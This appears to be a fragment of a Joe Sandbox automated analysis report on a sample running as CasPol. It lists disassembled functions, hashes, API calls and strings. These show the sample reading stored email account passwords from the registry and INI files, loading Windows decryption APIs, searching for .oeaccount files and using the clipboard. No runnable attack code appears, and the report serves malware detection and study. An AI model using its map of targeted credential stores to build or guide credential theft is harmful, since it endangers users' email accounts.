                                                                                                                                                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                  • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$Enummemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1615280680-0
                                                                                                                                                                                  • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                  • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                  • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                  • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                  • String ID: sqlite3.dll
                                                                                                                                                                                  • API String ID: 3677997916-1155512374
                                                                                                                                                                                  • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                  • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: eBD
                                                                                                                                                                                  • API String ID: 823142352-44267735
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_strcmpimemset
                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                  • API String ID: 520177685-3817206916
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                    • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1880195650-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1208763047-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                    • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$EnumOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1938129365-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 145871493-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4165544737-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Enum
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2928410991-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0040CF3F,00000000,00000000,00000000,?,?,0040D05D), ref: 0040C591
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID: (yE$(yE$(yE
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                  • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                  • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
